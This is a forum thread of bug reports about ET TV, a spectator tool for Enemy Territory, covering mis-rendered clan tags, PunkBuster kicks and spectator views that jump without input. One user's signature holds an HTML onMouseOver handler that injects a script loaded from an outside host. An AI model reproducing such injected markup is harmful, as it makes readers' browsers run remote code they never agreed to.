ET TV Known Bugs

Forum for discussing ET TV

Moderators: Forum moderators, developers

Dogwood

Post by Dogwood »

Tuesday night, while veiwing the TWL match, Kinetic's tag was kinda messed up.
Their tag is just the tilde (~), which showed up just fine in the chat area of the screen, but when their names appeared in the "killed by" area or the scroreboard, their tag was the quote (").
I was watching this with a few clanmates while on TS, and they all saw the same thing.
I have a demo if you wish.
BBr|ET Clan Leader
BroadbandReports.com
Rain

Post by Rain »

Dogwood wrote:Tuesday night, while veiwing the TWL match, Kinetic's tag was kinda messed up.
Their tag is just the tilde (~), which showed up just fine in the chat area of the screen, but when their names appeared in the "killed by" area or the scroreboard, their tag was the quote (").
I was watching this with a few clanmates while on TS, and they all saw the same thing.
I have a demo if you wish.
That's not an ETTV bug, it's an oddity in ET's fonts and happens during normal games as well.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
-7- Slappy

Post by -7- Slappy »

Latest version, getting kicked for PB Init Failure, and the No Packet Flow error also. :(
bani
Site Admin

Post by bani »

you cant run pb with ettv.
-7- Slappy

Post by -7- Slappy »

On the slave side? We've tried disabling it (both client and slave server) and no good.
bani
Site Admin

Post by bani »

slave.

you cant turn it off after you startup the server. you have to disable it in the server commandline before the server ever starts up.
-7- Slappy

Post by -7- Slappy »

Tried +set sv_punkbuster 0 - doesn't take. Tryng to get it set into a script instead.
bani
Site Admin

Post by bani »

you probably have a server script or cfg turning pb on after the server is started.
-7- Slappy

Post by -7- Slappy »

Heh, we just jacked all the PB files out of the slave server for now. Problem solved. 8)
nUllSkillZ

Post by nUllSkillZ »

On 1st of december 2004 while watching the Eurocup X match Gunslingers vs. 141 the following happened:
I was following the shoutcaster.
But from time to time my POV switched from the shoutcaster to one of the players without touching the mouse / keyboard.
jorylit

Post by jorylit »

nUllSkillZ wrote:On 1st of december 2004 while watching the Eurocup X match Gunslingers vs. 141 the following happened:
I was following the shoutcaster.
But from time to time my POV switched from the shoutcaster to one of the players without touching the mouse / keyboard.
i think the shoutcaster did it, and this is not a bug. :roll:
h4ks

Post by h4ks »

dunno if its already known, but a couple of days ago i was watching ettv with some other m8s on ts, we were all on the same ettv server but 2 of us were about 1 minute ahead of the others.

obviously we couldnt hold ourselves from spoiling it to the others 8) :P
CTM

Post by CTM »

On all the ET-TV matches I've watched I've noticed that if I'm following a player that dies/is killed and is then gibed the POV seems to randomly jump between other players on both teams without you touching the keyboard / mouse. When the player you were following respawns then the POV returns immediately to them.

It's definitely not the shoutcaster because it's my own ET-TV recorder / slave and they are console driven.

I also had a problem running ET-TV (http://bani.anime.net/banimod/forums/vi ... php?t=5118. It has occurred to me that on the Windows 2003 boxes I could get it to run on without messing about with compatibility modes had a single processor or didn't support Hyper-Threading. Of course it ran on my Windows XP desktop with does support HT but I thought it might be worth mentioning in case it gives Bani a clue! :)
bani
Site Admin

Post by bani »

CTM wrote:On all the ET-TV matches I've watched I've noticed that if I'm following a player that dies/is killed and is then gibed the POV seems to randomly jump between other players on both teams without you touching the keyboard / mouse. When the player you were following respawns then the POV returns immediately to them.
it's because the player you are spectating is switching views. you are seeing whatever player they are following.

i have no idea why w2k3 doesnt work and the workarounds provided dont make any sense. i can only guess w2k3 is really broken, more than usual for microsoft. :?